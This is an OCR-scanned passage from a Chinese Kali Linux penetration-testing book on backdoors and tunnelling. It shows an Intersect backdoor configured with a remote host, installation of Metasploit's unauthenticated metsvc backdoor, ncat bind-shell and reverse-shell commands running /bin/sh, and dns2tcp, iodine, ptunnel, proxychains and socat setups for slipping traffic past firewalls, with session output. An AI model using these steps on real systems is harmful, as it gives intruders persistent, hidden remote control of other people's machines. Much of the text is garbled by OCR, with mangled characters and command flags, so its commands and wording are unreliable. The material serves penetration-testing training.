Script will be saved as /usr/share/intersect/Scripts/test .py 


Specify the directory on the target system where the gathered files and in 
formation will be saved to. 

*Important* This should be a NEW directory. When exiting Intersect, this d 
irectory will be deleted if it contains no files. 

If you skip this option, the default (/tmp/Lift+$randomstring) will be use d. 
temp directory => 

enable logging => no 

bind port => 1337 

[+] bind port saved. 

remote host => 192.168.2.23 

[+] remote host saved. 

remote port => 1234 

[+] remote port saved. 

proxy port => 

kor cipher key => abcd 

[+] xor key saved. 

reversexor 


[+] Your custom Intersect script has been created! 
Location: /usr/share/intersect/Scripts/test. 


图 11.8 

只 有 在 远程 主机 安装 有 文件 scapy.py 的 情况 下 ， 才 能 运行 Intersect 
的 脚本 文件 。 如 果 遇 到 以 下 错误 : 

AttributeError:'module'object has no attribute "linux. distribution' 

则 说 明 被 测 主机 使 用 的 Python 版 本 过 老 。 此 时 要 将 脚本 中 的 distro2 
=platform.linux_distribution(O[0] 改 为 distro2 = platform. dist()[0]. 

在 创建 了 后 门 程序 之 后 ， 要 把 它 上 传 到 目标 主机 上 ， 并 在 目标 主机 
上 执行 。 








11.1.3 Meterpreter /z | ] 
著名 的 Metasploit meterpreter 程序 自 带 一 个 名 为 metsvc 的 后 门 程 


序 ， 它 可 让 您 随时 获取 Meterpreter 的 shell。 

需要 小 心 的 是 ，metsvc 程 序 没 有 采用 任何 认证 机 制 。 换 句 话 说， 所 
有 发 现 该 后 门 端口 的 人 都 应 该 能 够 使 用 这 个 后 门 。 

本 例 使 用 Windows XP 系统 的 主机 当 作 被 测 主机 。 被 测 主机 使 用 
192.168.2.21 作为 其 IP 地 址 ， 而 测试 主机 的 IP 地 址 是 192.168.2.22。 

若 要 启用 metsvc 后 门 ， 您 首先 要 利用 被 测 系 统 的 漏洞 获取 
Meterpreter shell。 在 获得 shell 之 后 ， 最 好 使 用 migrate 指令 把 当前 会 话 
( sessio ) 尹 接 到 其 他 进程 里 ， 例 如 explorer.exe(2)。 这 样 ， 即 使 
payload (1) 程序 意外 停止 ， 您 仍然 持 有 被 测 系统 的 控制 权 ( 见 图 














PID PPID Name Arch Session User Path 
e e [System Process] 4294967295 
4 e System x86 0 
136 1368 ctfmon.exe x86 8 THE -F4C66DD36CA\ C:\WINDOWS \system32\ct fmon.exe 
186 556 alg.exe x86 0 C:\WINDOWS\System32\alg.exe 
328 4 snss.exe x86 0 NT AUTHORITYXSYSTEM \SystemRoot\System32\smss.exe 
340 924  wscntfy.exe x86 60 THE -F4C68DD36CA* C:\WINDOWS \system32\wsent fy .exe 
480 328  csrss.oxe x86 9 NT AUTHORITYXSYSTEM \??\C:\WINDOWS\system32\csrss.exe 
504 328 winlogon.exe x86 9 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe 
556 504 services.exe x86 6 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe 
568 5304 lsass.exe x86 0 NT AUTHORITYXSYSTEM C:\WINDOWS\system32\lsass.exe 
748 556  VBoxService.exe x86 6 NT AUTHORITYXSYSTEM C:\WINDOWS\system32\VBoxService.exe 
788 556 svchost .exe x86 e NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost .exe 
860 556 svchost .exe x86 0 C:\WINDOWS\system32\svchost .exe 
924 556 svchost .exe x86 e NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost .exe 
972 556 svchost.exe x86 0 C: WINDOMSN syston32Nsvchost . exe 
2 56 Q g Q C f em host .exe 
explorer.exe 6 C 

JO spoolsv.exe gb Li," om32\spoolsv .exe 
1444 556 scardsvr.exe x86 e C: WINDOWS VSysten32 SC ardSvr.exe 
1664 556 svchost .exe x86 6 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost ,exe 
1964 1308 VBoxTray.exe x86 0 THE- Mer act C:NW na ray.exe 

689 3 exe Be Q = -\ D o 

met -back.exe 0 THE FACOGDD3SCANISET C:\Documents and Settin s\user\Desktop\net back .exe 





图 11.9 
接 下 来 ， 我 们 使 用 下 述 指令 安装 metsvc 服 务 。 
run metsvc 


述 指令 的 运行 结果 如 图 11.10 所 示 。 





meterpreter > run metsvc 
*] Creating a meterpreter service on port 31337 
*] Creating a temporary installation directory C:\DOCUME~1\user\LOCALS~1\Temp\hFSGPuffumYt. . 
*] >> Uploading metsrv.x86.dll... 
] >> Uploading metsvc-server.exe... 
*] >> Uploading metsvc.exe... 
] Starting the service... 
* Installing service metsvc 
* Starting service 
Service metsvc successfully installed. 


x 








meterpreter > 
图 11.10 
现在 我 们 在 被 测 主 机 上 打开 文件 夹 C:\Documents and 


Settings\user\Local Settings\Temp\ hFSGPuffumYt， 可 在 其 中 找到 后 门 程 
序 的 文件 〈 见 图 11.11) 。 


L hFSGPuffumyt 
File Edt View Favorites Tools Help 


Qe - © BD seh | Foes Fi] 


Address |©) C:\Documents and SettingsluserlLocal Settingsi TemplhFSGPuffumYt v Ea 
Size Type Date Modified 
27/12/2013 22:24 
27/12/2013 22:25 
27/12/2013 22:25 


* O MEI18762 
DD database 
CJ h£SGPuffumvt 





图 11.11 
这 个 目录 里 有 metsvc 的 EXE 文 件 和 DLL 文件 。 现 在 我 们 重新 启动 被 
测 主 机 ， 来 检验 一 下 这 个 后 门 是 否 会 在 启动 时 目 动 加 载 。 
我 们 在 测试 主机 上 启动 会 话 处 理 程序 ， 并 设 定 metsvc payload 的 选 





项 ( 见 图 11.12) : 
e RHOST: 192.168.2.21 〈 被 测 主机 ) ; 
e LPORT: 31337“《〈 后 门 程序 的 端口 号 码 ) 。 


msf exploit(handler) > show options 





Module options (exploit/multi/handler) : 


Name Current Setting Required Description 


Payload options (windows/metsvc_bind tcp): 


Name Current Setting Required Description 

EXITFUNC process yes Exit technique (accepted: seh, thread, process, none) 
LPORT 31337 yes The Listen port 

RHOST 192.168.2.22 no The target address 


Exploit target: 


Id Name 








6 Wildcard Target 








图 11.12 
设置 好 各 选项 之 后 ， 我 们 使 用 execute 指 令 发 起 攻击 《〈“ 见 图 
11.13) 。 
msf exploit(handler) > exploit 


[*] Started bind handler 
[*] Starting the payload handler... 
[*] Meterpreter session 3 opened (192.168.2.22:47828 -> 192.168.2.21:31337) at 2013-12-27 23:20:50 «0700 





[11.13 
述 信息 表明 ， 测 试 主机 发 起 的 攻击 已 经 成 功 ; 我 们 再 次 获取 到 了 
被 测 | 的 Meterpreter 会 话 。 此 后 ， 您 可 在 这 个 会 话 里 为 所 欲 为 。 
如 需 在 被 测 主 机 上 逢 载 metsvc 服务 ， 您 需要 在 Meterpreter shell 里 使 
用 以 下 指令 
run metsvc -r 


这 样 就 可 卸载 metsvc 程 序 。 


11.2 隧道 工具 


在 计算 机 领域 里 ， 了 隧道 是 指使 用 某 个 网 络 协议 封装 另外 一 种 网 络 协 
议 的 技术 手段 。 在 渗透 测试 中 ， 使 用 隧道 技术 主要 为 了 让 目标 系统 的 防 
护 机 制 无 法 发 挥 作用 。 多 数 情况 下 ， 目 标 系 统 的 防火 墙 会 阻止 内 部 系统 
访问 外 网 网 络 ， 只 放行 DNS、HTTP 和 HTTPS 这 类 的 常见 网 络 协 议 。 在 
这 种 情况 下， 如果 要 在 目标 系统 的 内 网 使 用 外 网 的 其 他 网 络 协 议 ， 就 需 
要 构建 HTTP 协 议 的 隧道 。 这 样 ， 防 火 墙 就 会 放行 隧道 封装 的 数据 。 

Kali Linux 收录 了 几 款 隧道 封装 工具 ， 以 把 某 种 协议 的 数据 藏 在 其 
他 协议 之 中 。 下 文 将 会 介绍 部 分 隧道 封装 工具 。 





11.2.1 dns2tcp 

dns2tcpzé FRET CP Bt 6.0978: DNS BOURSE. FY Bis ST R T 
具 。 它 适用 于 目标 主机 只 能 发 送 DNS 请 求 的 网 络 环境 。 当 它 在 特定 端 
口 受理 连接 请 求 时 ， 它 会 数据 封装 为 DNS 协议 的 格式 ， 再 发 送 到 指定 主 
机 的 指定 端口 的 dns2tcp 服 务 端 程序 。 

dns2tcp 采 用 了 CS 客户 端 /服务 器 〉 架 构 。 客 户 端 程序 叫做 
dns2tcpc， 服 务 右 问 叫 做 dns2tcpd。 

要 启动 dns2tcp 的 服务 器 端 程 序 ， 可 在 终端 中 使 用 下 述 指令 。 

# dns2tcpd 

上 述 指令 将 会 在 屏幕 上 显示 简短 的 使 用 说 明 。 

如 需 使 用 dns2tcp 的 客户 站 程序 ， 可 在 终端 中 使 用 下 述 指令 。 

# dns2tcpc 

上 述 指令 将 会 在 屏幕 上 显示 简短 的 使 用 说 明 。 

在 使 用 dns2tcp 之 前 ， 需 要 创建 一 个 指 同 公 网 dns2tcp 服务 占 IP 的 
NS 记录 。 建 议 为 dns2tcp 的 程序 分 配子 域名 的 DNS 记 录 ， 例 如 
dnstimnel.myexample.com. 

之 后 就 要 配置 dns2tcp 服务 器 。 默 认 情 况 下 ，dns2tcp 服务 器 端 程序 
会 在 当前 用 户 的 主 目录 下 寻找 文件 .dns2tcprcd， 将 之 用 作 配 置 文件 。 











我 们 使 用 以 下 内 容 创 建 一 个 标准 的 dns2tcp 服 务 器 端 配置 文件 。 
listen = 0.0.0.0 
port = 53 
user = nobody 
chroot = /tmp 
domain = dnstunnel.example.com 
resources = ssh:127.0.0.1:22 
然后 把 这 个 文件 保存 为 /etc/dns2tcpd.conf。 
创建 好 配置 文件 之 后 ， 可 通过 下 述 指 令 启 动 dns2tcp 的 服务 器 并 程 


# dns2tcpd -F -d 1 -f /etc/dns2tcpd.conf 

上 述 指令 将 dns2tcpd 的 调试 级 别 设置 为 1(-d 1)， 并 令 其 在 前 台 运 行 
CF)» 

dns2teph 2 7 9m FE FF [E] FE m EE BEAT AC 2 AH A BRA BAE — 
AN AP im MH BE PP BAY a FE SCF 


domain = dnstunnel.example.com 





ressource = ssh 

local_port = 2222 

debug_level =1 

将 这 个 配置 文件 保存 为 /etc/dns2tcpc.conf， 或 保存 为 文 
件 .dns2tcprc。 这 样 ， 我 们 就 可 在 执行 dnstcpc 程 序 时 用 配置 文件 提供 参 
数 ， 而 不 必 在 每 次 执行 程序 的 时 候 都 通过 很 长 的 命令 行 指令 传递 程序 参 
数 。 

接 下 来 ， 使 用 以 下 指令 局 动 隧道 的 客户 端 程序 。 

# dns2tcpc —z dnstunnel.example.com -c -f /etc/dns2tcpc.conf 

而 且 要 用 下 述 命令 开局 SSH 会 话 。 

# ssh -p 2222 yourname@127.0.0.1 





dns2tcp 程 序 能 够 以 DNS 协议 封装 数据 包 ， 但 是 它 的 隧道 并 不 具备 加 
密 功 能 。 因 此 ， 您 可 能 需要 对 进入 协议 隧道 前 的 数据 包 进 行 加 密 处 理 。 
11.2.2 iodine 


iodine 是 一 球 能 够 将 IPv4 的 网 络 流量 封装 为 DNS 协 议 的 工具 。 它 特 
别 适 用 于 目标 主机 只 能 发 送 DNS 请 求 的 网 络 环境 。 

与 其 他 DNS 隧 道 工 具 相 比 ，iodine 具 备 以 下 优势 : 

e 在 处 理 下 行 数据 时 ， 它 可 以 对 不 其 编码 ， 所 以 iodine 的 性 能 更 为 
出 色 ; 

e 文 持 多 种 操作 系统 ， 它 可 以 在 ”Linux、Mac OS, FreeBSD, 
NetBSD、OpenBSD 和 Windows 系 统 上 运行 ; 
e 它 可 用 密码 保护 通信 隧道 ; 
© 最 多 文 持 16 个 并 发 连接 。 
在 使 用 这 个 程序 之 前 ， 您 需要 准备 以 下 条 件 : 
e 使 用 尽 可 能 短 的 域名 ; 域名 越 短 ， 隧 道 的 市 宽 消耗 束 越 小 ; 
e 能 够 管理 某 个 域 的 A 记录 和 NS 记录 ; 
e 如 果 要 通过 Internet 将 iodine 的 客户 端 程序 连接 到 其 服务 器 问 程 
那么 运行 服务 器 端 程序 的 主机 应 当 有 具备 独立 的 公 网 卫 ; 
e 客户 端 程序 能 够 通过 隧道 连接 到 互联 网 。 
在 准备 好 上 述 事 宜 之 后 ， 就 要 分 别 配 置 DNS 服务 器 、iodine 服 务 端 
BIAS Pitt e 

1. 配置 DNS 服务 器 

如 果 您 拥有 某 个 域 Cexample.com) ， 那 么 可 以 给 这 个 隧道 分 配 一 
个 子 域 (例如 tunnel.example.com) 。 如 果 这 个 域 的 名 称 解 析 服 务 器 使 用 
BIND 程 序 解析 DNS， 那 么 您 可 以 在 example.com 的 区 域 文件 (zone 
file) 里 添加 以 下 2 行 。 

dns IN A 192.168.200.1 














# 


tunnel IN NS dns.example.com. 

上 述 两 行 的 作用 是 : 

e 添加 一 个 名 为 dns WA 记录 ; 

e 名 为 dns.example.com 的 DNS 服务 器 负责 解析 tunnel 子 域 。 

其 中 ，192.168.200.1 是 iodine 服 务 端 主机 使 用 的 IP 地 址 。 

在 修改 了 区 域 文件 (zone file) 之 后 ， 重 司 BIND 服务 端 程序 以 使 配 
置 生效 。 

2. 器 端 模 式 运 行 jodine 

以 服务 器 端 模式 启动 iodine 程 序 的 指令 如 下 。 

iodined -f —c —P password 192.168.200.1 tunnel.example.com 

上 述 指令 的 各 选项 的 意思 如 下 。 

e -f: 以 前 台 模 式 运 行 服务 器 端 程序 。 

e-P: FRE RS atin Be Fe PA AY SR RO. 

e-C: 仅 用 客户 端 地 址 检查 。 

3. 户 端 模 式 运 行 iodine 

以 客户 端 模式 运行 iodine 程 序 ， 只 需要 指定 1 一 2 个 参数 。 第 一 个 参 
数 是 本 地 DNS 服务 器 《可 选 ) ， 第 二 个 参数 是 隧道 使 用 的 域名 〈 本 例 
中 ， 这 个 域 是 tunnel.example.com) . 

以 客户 端 模式 启动 iodine 程 序 的 指令 如 下 。 

iodine —f —P password tunnel.example.com 

ARS ait hig EDL Se 2 O8 28) m FEL AIP Eo TKIP HE SES 
会 是 192.168.200.2 或 192.168.200.3。 

在 测试 隧道 连接 时 ， 可 以 ping 隧 道 对 端的 耳 地 址 。 

可 以 在 客户 端 主机 上 使 用 以 下 指令 。 

ping 192.168.200.1 

可 以 在 服务 器 端 主机 上 使 用 以 下 指令 。 

ping 192.168.200.2 

















ex 


您 可 能 需要 实际 情况 调整 指令 中 的 Ip 地 址 。 


11.2.3 ncat 
neat 是 一 款 集 发 送 、 接 收 、 转 发 、 加 密 数 据 等 多 种 功能 于 一 身 的 网 
络 工 具 。ncat 是 著名 的 Netcat 程 序 


(http://nmap.org/ncat/guide/index.html) 的 改进 版 本 ， 它 的 功能 

e 它 可 用 作 Web 服务 程序 和 其 他 TCP/IP ”服务 器 端 程序 的 简易 
TCP/UDP/SCTP/ SSL 客 户 端 ; 

e 它 可 用 作 简 单 的 TCP/UDP/SCTP/SSL 服务 器 端 程序 ; 

e 它 可 转发 或 代理 TCP/UDP/SCTP 流量 ; 

e 它 可 用 作 执 行 系统 指令 的 网 络 网 关 ; 

e 它 可 使 用 SSL 技术 加 密 通信 数据 ; 

e 它 可 使 用 IPv4 或 IPv6 进行 网 络 传输 ; 

e 它 可 用 作 连 接 代理 (Connection Broker) ， 通 过 第 三 个 中 介 服 务 
器 使 两 个 〈 或 更 多 ) 的 客户 端 互 联 互通 。 

因为 本 篇 讨论 的 是 在 目标 主机 上 创建 操作 系统 后 门 的 方法 ， ”所 以 
仪 介绍 ncat 与 后 门 有 关 的 功能 。 

首先 应 当 创 建 一 个 常规 的 backdoor shell。 我 们 以 监听 模式 启动 ncat 
程序 ， 并 指定 监听 的 网 络 端口 。 当 攻击 人 员 连 接 到 主机 的 这 个 端口 时 ， 
就 能 够 获取 到 主机 的 shell 会 话 。 

在 本 例 中 ， 各 主机 使 用 的 IP 地 址 如 下 : 

e 攻击 人 员 的 IP 地 址 是 192.168.2.21; 

e 被 测 主机 的 IP 地 址 是 192.168.2.23。 

接着 ， 我 们 在 被 测 主 机 上 运行 下 述 指令 。 

ncat -1 1337 —e /bin/sh 

上 述 指令 各 选项 的 作用 分 别 如 下 。 

e-l: 指定 监听 端口 。 


e-e: 指定 shell 的 执行 指令 。 

然后 ， 我 们 通过 下 述 命 令 ， 使 攻击 人 员 的 主机 连接 到 被 测 主机 的 
backdoor shell. 

ncat 192.168.2.23 1337 

如 图 11.4 所 示 ， 上 述 指 令 将 连接 到 被 测 主 机 的 shell。 


oot@kali:~# ncat 192.168.2.23 1337 
id 
luidzl000(msfadmin) gidz1000(msfadmin) groups=4( adm) ,20(dialout) ,24(cdrom) ,25( floppy) ,29( audio) ,36(dip) ,44( 
ideo) ,46(plugdev) ,107( fuse) ,111(lpadmin) ,112( admin) ,119(sambashare) ,1600(msfadmin) 

ifconfig 

lethG Link encap:Ethernet HwWaddr 08:00:27:43:15:18 

inet addr:192.168.2.23 Bcast:192.168.2.255 Mask:255.255.255.6 

inet6 addr: fe80::a00:27ff:fe43:1518/64 Scope:Link 

UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 

RX packets:23753 errors:O dropped:O overruns:O frame:0 

TX packets:21364 errors:O dropped:@ overruns:@ carrier:G 

collisions:@ txqueuelen: 1066 

RX bytes:18165440 (17.3 MB) TX bytes:2430545 (2.3 MB) 

Base address:Oxd010 Memory : fG0GG0G6 -f0020000 


图 11.14 

下 面 ， 我 们 将 在 被 测 主机 上 创建 reverse shell， 使 其 自主 连接 到 攻击 
人 员 的 主机 上 。 

我 们 首先 要 在 攻击 人 员 的 主机 上 配置 ncat 程 序 ， 让 它 监听 1337 端 
m 

ncat -] 1337 

接 下 来 ， 我 们 在 被 测 主机 上 执行 下 述 指令 。 

ncat 192.168.2.21 1337 -e /bin/sh 

执行 完 这 个 指令 之 后 ， 我 们 就 可 在 攻击 人 员 的 测试 主机 上 看 到 图 
11.15 的 信息 。 




















ro kali:~# ncat -l 1337 

id 

uid-1000(msfadmin) gid=10G0(msfadmin) groups=4(adm) ,20(dialout) ,24(cdrom) ,25( floppy) ,29(audio) ,30(dip) ,44(v 
ideo) ,46(plugdev) ,107( fuse) ,111(lpadmin) ,112( admin) ,119(sambashare) , 1600 (msfadmin) 


[11.15 
可 随时 使 用 组 合 键 Ctrl+C 退出 backdoor shell. 
应 当 注 意 的 是 ， 上 述 两 个 例子 并 没有 对 网 络 流量 进行 加 密 处 理 。 如 
果 需 要 加 密 网 络 数据 ， 就 应 当 使 用 cryptcat 程 序 。 在 使 用 cryptcat 时 ， 务 
必要 在 通信 的 两 端 使 用 选项 设置 加 密 密 码 ， 人 否则 它 将 使 用 默认 密码 进 





11.2.4 proxychains 

proxychains 程 序 可 强制 TCP 客 户 端 程序 通过 指定 的 代理 服务 器 《或 
代理 链 ) 发 起 TCP 连 接 。 上 自 3.1 版 本 起 ， 它 支持 SOCKS4 代 理 、SOCKET5 
代理 和 基于 CONNECT 模 式 的 HTTP 代 理 服 务 占 。 

proxychains 的 文档 介绍 了 它 的 各 种 用 途 : 

e 适用 于 通过 代理 服务 器 访问 外 部 网 络 的 情况 ; 

e 可 用 于 罕 越 限制 外 联 端口 的 防火 场 〈 出 口 过 滤 ) : 

e 可 将 2 个 (或 更 多 ) 代理 服务 器 组 成 代理 服务 器 链 ; 

e 可 以 让 本 寻 不 文 持 代理 的 程序 使 用 代理 服务 器 ， 例 如 Telnet、 
Wget, FTP. VNC 和 Nmap 程 序 ， 它 们 都 是 直接 发 起 连接 的 程序 ; 

e 可 以 通过 反 回 代理 服务 器 从 网 络 外 部 访问 内 网 。 

如 需 启 动 proxychains 程 序 ， 可 在 终端 中 使 用 下 述 指令 。 

# proxychains 

上 述 指令 将 会 在 屏幕 上 显示 简单 的 使 用 说 明 。 

在 Kali Linux 中 ，Pproxychains 的 配置 文件 是 /etc/proxychains.conf。 默 
认 情 况 下 它 使 用 的 代理 服务 器 是 tor。 如 需 使 用 其 他 代理 服务 器 ， 可 在 
配置 文件 的 最 后 部 分 声明 需要 添加 的 代理 服务 右 。 

本 例 所 使 用 的 配置 文件 ， 其 最 后 的 代理 服务 器 声明 部 分 的 内 容 如 下 
所 示 。 

[ProxyList] 














# add proxy here .… 
# meanwile 
# defaults set to "tor" 
socks4 127.0.0.1 9050 
声明 代理 服务 器 的 格式 如 下 所 示 。 


proxy_type host port [user pass] 

代理 服务 器 类 型 即 http、socks4 或 socks5。 

如 果 要 使 Telnet 程 序 通过 代理 服务 器 建立 连接 ， 可 使 用 下 述 指令 。 

# proxychains telnet example.com 

上 述 指令 将 使 telnet 程序 通过 Cproxychians 配置 文件 指定 的 ) 代理 
服务 器 登录 到 example.com 的 telnet 服 务 。 


11.2.5 ptunnel 

ptunnel 是 一 蒜 使 用 ICMP ping 《请求 和 回复 ) 封装 TCP 连接 的 隧道 
工具 。 即 使 被 测 主机 无 法 癌 Internet 发 送 任何 TCP 和 UDP 的 数据 ， 只 要 和 它 
可 以 同 取 Internet 发 起 ping 指 令 ， 那 么 这 于 工具 就 可 以 帮助 它 罕 越 防火 
墙 。ptunnel 可 以 脱离 TCP 和 UDP 连接 访问 E-mail、 上 网 或 进行 其 他 网 络 
活动 。 

如 需 启 动 ptunnel 程 序 ， 可 在 终端 中 使 用 下 述 指令 。 

# ptunnel -h 

上 述 指令 将 会 在 屏幕 上 显示 简单 的 使 用 说 明 及 相关 范例 。 

需要 配合 代理 服务 器 才能 在 客户 端 使 用 ptunnel 程 序 。 而 且 客 户 端 程 
序 所 在 的 主机 必须 能 够 访问 服务 器 端的 主机 。 男 外 ， 如 果 要 在 Internet 上 
架设 ptunnel 服 务 器 端 程序 ， 那 么 服务 堪 端 主机 必须 使 用 公 网 可 以 直接 访 
问 到 的 IP 地 址 。 

在 此 之 后 ， 可 通过 下 述 指 令 启 动 ptunnel 的 服务 器 端 程序 。 

# ptunnel 

服务 器 疹 程序 将 会 监听 所 有 的 TCP 协 议 的 数据 包 。 

[inf]: Starting ptunnel v 0.71. 

[inf]: (c) 2004-2009 Daniel Stoedle, <daniels@cs.uit.no> 


[inf]: Security features by Sebastien Raveau, <sebastien.raveau 








@epita.fr> 


[inf]: Forwarding incoming ping packets over TCP. 

[inf]: Ping proxy is listening in privileged mode. 

本 例 中 ， 客 户 问 要 把 本 机 的 2222 端口 的 通信 经 由 ptunnel Hi 5 aF Ym 
( ptunnel. example.com) 转发 到 ssh 服 务 器 (ssh.example.org) 的 22 端 

口 。 创 建 这 样 一 个 定 癌 通信 隧道 的 指令 如 下 。 

# ptunnel -p ptunnel.example.com -lp 2222 -da ssh.example.org -dp 22 

客户 端 将 会 显示 如 下 信息 。 

[inf]: Starting ptunnel v 0.71. 

[inf]: (c) 2004-2009 Daniel Stoedle, <daniels@cs.uit.no> 


[inf]: Security features by Sebastien Raveau, <sebastien.raveau@ 





epita.fr> 

[inf]: Relaying packets from incoming TCP streams. 

然后 ， 让 SSH 连 接 到 ptunnel 程 序 形成 的 隧道 

# ssh localhost -p 2222 

接 下 来 ， 我 们 使 用 正确 的 用 户 名 和 和 密码 来 登录 SSH 服 务 器 

Hs {EY PAE CAS d 3s 11 AY n 11 AE A Dx 18 EB AY 2 
码 ， 这 样 就 可 以 防止 其 他 人 使 用 您 的 ptunnel 隧 道 。 当 然 ， 客 户 端 和 服务 
峰 问 应 当 使 用 相同 的 密码 。 





11.2.6 socat 


socath zi — 3 fii FH PAM CSL) 双 同 传输 数据 的 
HK REP “EA SCH ES XC RES PS A A a PH GRA 
地 址 类 型 [address type]) 。 地 址 类 型 可 以 是 以 下 某 个 《或 某 两 个 ) 类 型 
的 数据 对 象 : 

e X (T; 

e 程序 ; 

e 文件 描述 符 ; 











e Socket (IPv4、IPv6、SSL、TCP、UDP 和 UNIX) ; 

e 设备 (网 卡 、 串 行 线 、TUN/TAP 设备 ) ; 

e 管道 。 

以 上 每 种 数据 流 都 可 以 添加 各 种 参数 。 这 种 参数 可 以 是 锁定 模式 、 
用 户 、 组 、 权 限 、 地 址 、 端 口 、 创 建 人 、 密 码 、 密 钥 等 数据 。 

其 官方 文档 表明 ，socat 程 序 的 工作 流程 分 为 4 个 阶段 。 

e 初始 化 阶段 : 在 第 一 阶段 ，socat 程序 要 解析 命令 行 里 的 选项 并 初 
始 化 日 志 系 统 。 

e 建立 连接 阶段 : 在 第 二 阶段 ，socat 程序 会 依次 打开 第 一 ( 源 ) 地 
址 和 第 二 《目标 ) 地 址 。 因 为 必须 先 读 后 号 ， 所 以 如 果 不 能 打开 第 一 个 
地 址 ， 程 序 就 会 直接 退出 。 

e 数据 传输 阶段 : 在 第 三 阶段 ，socat 程序 通过 select() 函 数 监控 两 
个 数据 通道 的 * 读 写 ” 文 件 描述 符 。 当 数据 源 地 址 可 读 且 目标 地 址 可 写 
时 ，socat 会 读 取 源 数 据 ， 并 在 必要 的 时 候 进 行 换行 符 的 转换 ， 把 源 数 据 
写 到 另外 一 个 数据 流 里 的 目标 文件 描述 符 里 ， 之 后 周而复始 。 

e 关闭 连接 阶段 ， 当 某 个 地 址 流 过 到 了 EOF〔 正 常 或 意外 终止 信 
号 ) ， 程 序 就 进入 了 第 四 阶段 。socat 会 在 另外 一 个 数据 流 里 传递 EOF 信 
恩 。 如 果 关 闭 连接 后 ， 在 预定 的 时 间 范 围 内 ，socat 在 另外 一 个 方向 仍然 
在 传输 数据 ， 那 么 程序 将 关闭 所 有 数据 通道 并 停止 运行 。 

如 需 启 动 socat 程 序 ， 可 在 终端 中 执行 下 述 指令 。 

# socat -h 

上 述 指令 将 在 屏幕 上 显示 命令 行 指 令 的 各 个 选项 ， 以 及 可 选择 的 地 
址 类 型 。 
各 种 常用 的 地 址 类 型 、 关 键 字 和 参数 的 有 关 介 绍 如 下 所 示 。 





地 址 类 型 有 关 介绍 


DS 使 用 creat () 方式 打开 文件 <filename>， 并 使 用 文件 描述 符 进行 写 
入 。 由 于 以 creat O 方式 打开 的 文件 可 写 不 可 读 ,， 所 以 这 种 地 址 类 型 打 
开 的 是 必须 是 “只 可 写 ” 的 对 象 

EXEC :<command~1ine> 这 个 指令 将 会 派生 出 一 个 子 进程 。 派 生 进程 会 与 父 进程 建立 通讯 ， 并 使 
用 execvp () 执行 指定 的 程序 。<command- line> 就 是 普通 的 命令 行 
指令 ， 可 用 单 空 格 分 割 指令 参数 


FD:<fdnum> 使 用 文件 描述 符 <fdnum> 

INTERFACE:<interface> 发 送 原 始 数 据 的 、 链 路 级 别 的 网 络 接口 。<interface> 应 为 网 卡 接口 的 
名 称 。 这 个 选项 只 对 Linux 系统 有 效 

IP4- 创建 raw IP socket。 程 序 将 使 用 <protocol1> 协 议 向 <host> 主 机 发 送 数据 

SENDTO:<host>:<protocol> 包 ， 并 且 只 会 处 理 指定 主机 的 数据 ， 忽 略 其 他 无 关 主 机 的 数据 包 。 如 果 指 定 
protocol 为 255， 它 将 使 用 raw socket, d! IP header 也 当 作 数据 的 一 部 分 

IP4-RECV:<protocol> 建立 一 个 <protocol> 协 议 的 raw IP socket。 它 可 从 多 个 未 限定 的 对 端 
(peer) 接受 数据 ， 并 能 合并 数据 包 。 它 不 会 进行 任何 回复 。 如 果 指 定 
protocol 为 255， 它 将 使 用 raw socket, 把 IP header 也 当 作 数据 的 一 部 分 

OPEN:<filename> 这 将 使 用 操作 系统 的 open() 方 法 打开 文件 <filename>。 这 个 选项 不 可 
用 于 UNIX 域 套 接 字 (UNIX domain socket) 

OPENSSL: <host>:<port> 程序 将 于 主机 <host> 的 <port> 端 口 建立 SSL 连接 。 它 可 根据 指定 的 地 
址 、 名 称 解析 ， 或 pf 选项 的 设置 自动 使 用 IPv4 或 IPv6 的 网 络 协议 

OPENSSL-LISTEN:<port> 程序 将 监听 TCP 的 <port> 端 口 , 并 根据 pf 选项 的 设置 决定 采用 IPv4/6 
的 网 络 。 其 受理 连接 的 方式 与 SSL 服务 端 程 序 一 致 

PIPE:<filename> 如 果 文 件 <filename> 事 前 存在 ， 那 么 程序 将 打开 这 个 文件 。 和 否则 将 创 
建 并 打开 命名 管道 Cnamed pipe) 

TCP4:<host>:<port> 连接 主机 <host3 的 TCP<port> 端 口 

TCP4-LISTEN :<Port> 监听 主机 的 TCP <port> 端 口 以 受理 TCP/IP 连接 


续 表 


地 址 类 型 
UDP4:<host>:<port> 


UDP4-LISTEN:<port> 


UDP4-SENDTO: <host>:<port> 


UDP4-RECV: <port> 


UNIX-CONNECT: <filename> 


UNIX-LISTEN:<filename> 


UNIX-SENDTO:<filename> 


UNIX-RECV:«filename» 


有 关 介 绍 
连接 主机 <host> 的 UDP <port> 端 口 
在 主机 的 UDP <port> 端 口 等 待 数据 。 如 果 收 到 数据 包 ， 将 与 发 包 主 机 
建立 连接 
将 使 用 UDPv4 协议 , 与 <host> 和 <port> 选 项 指定 的 对 端 进行 通信 。 它 
将 问 该 Socket 发 送 数据 ， 并 且 只 受理 该 socket 返回 的 数据 
这 将 使 用 UDPv4 协议 在 主机 的 <port> 端 口 创建 UDP socket。 它 可 从 多 
个 未 限定 的 对 端 (peer) 接受 数据 ， 并 能 合并 数据 包 。 不 过 它 不 会 进行 
任何 回复 
将 以 UIXN 域 套 接 字 的 方式 连接 <filename>。 如 果 <filename> 不 存 
在 、<filename> 不 是 Unix 域 套 接 字 ,或 者 它 是 UNIX 域 套 接 字 而 没有 
对 应 的 监听 进程 ， 程 序 都 会 报错 
以 Unix domain stream socket 的 方式 监听 <file name>， 并 受理 连接 。 
如 果 <filename> 存 在 且 不 是 一 个 socket， 则 会 发 生 错 误 
以 UNIX domain datagram socket 的 形式 ， 与 <filename> 选 项 指定 的 对 
端 socket 进行 通信 。 它 将 向 该 Socket 发 送 数据 ， 并 且 只 受理 对 端的 该 
socket 返回 的 数据 
创建 名 为 <filename> 的 UNIX domain datagram socket。 它 可 从 多 个 未 
指定 的 对 端 接 受 数据 ， 并 将 数据 进行 合并 ， 不 过 它 不 会 进行 任何 回复 


后 续篇 幅 将 会 演示 socat 的 几 种 具体 应 用 。 
1. 获取 HTTP header 信息 


如 需 获 取 HTTP header 信息 ， 可 使 用 下 述 指令 。 


socat — TCP4:192.168.2.23:80 


HEAD / HTTP/1.0 


